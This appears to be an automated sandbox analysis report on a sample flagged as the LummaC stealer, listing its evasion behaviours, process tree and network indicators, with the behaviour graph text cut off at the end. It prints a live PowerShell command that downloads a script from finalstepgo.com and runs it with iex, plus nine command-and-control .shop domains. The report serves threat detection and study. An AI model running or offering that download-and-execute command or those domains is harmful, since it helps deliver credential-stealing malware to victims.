Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8719 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1162 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112 Thread sleep count: 8719 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112 Thread sleep count: 1162 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 7308 Thread sleep time: -60000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWy
Source: PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: PrivacyDrive.exe, 00000010.00000002.1579534650.0000000001798000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_05A06730 LdrInitializeThunk, 16_2_05A06730
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C055F mov edx, dword ptr fs:[00000030h] 16_2_047C055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C0B1F mov eax, dword ptr fs:[00000030h] 16_2_047C0B1F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C116E mov eax, dword ptr fs:[00000030h] 16_2_047C116E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C116F mov eax, dword ptr fs:[00000030h] 16_2_047C116F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C0ECF mov eax, dword ptr fs:[00000030h] 16_2_047C0ECF

HIPS / PFW / Operating System Protection Evasion
barindex
LummaC encrypted strings found
Source: PrivacyDrive.exe String found in binary or memory: deallyharvenw.shop
Source: PrivacyDrive.exe String found in binary or memory: priooozekw.shop
Source: PrivacyDrive.exe String found in binary or memory: racedsuitreow.shop
Source: PrivacyDrive.exe String found in binary or memory: defenddsouneuw.shop
Source: PrivacyDrive.exe String found in binary or memory: candleduseiwo.shop
Source: PrivacyDrive.exe String found in binary or memory: surroundeocw.shop
Source: PrivacyDrive.exe String found in binary or memory: covvercilverow.shop
Source: PrivacyDrive.exe String found in binary or memory: pumpkinkwquo.shop
Source: PrivacyDrive.exe String found in binary or memory: abortinoiwiam.shop
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519588 URL: http://google.com Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 46 finalstepgo.com 2->46 48 candleduseiwo.shop 2->48 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 6 other signatures 2->64 9 cmd.exe 1 2->9         started        12 chrome.exe 9 2->12         started        15 chrome.exe 2->15         started        signatures3 process4 dnsIp5 72 Suspicious powershell command line found 9->72 17 powershell.exe 15 14 9->17         started        22 conhost.exe 1 9->22         started        52 192.168.2.16, 138, 443, 49697 unknown unknown 12->52 54 192.168.2.4 unknown unknown 12->54 56 239.255.255.250 unknown Reserved 12->56 24 chrome.exe 12->24         started        signatures6 process7 dnsIp8 38 finalstepgo.com 185.255.122.133, 443, 49823, 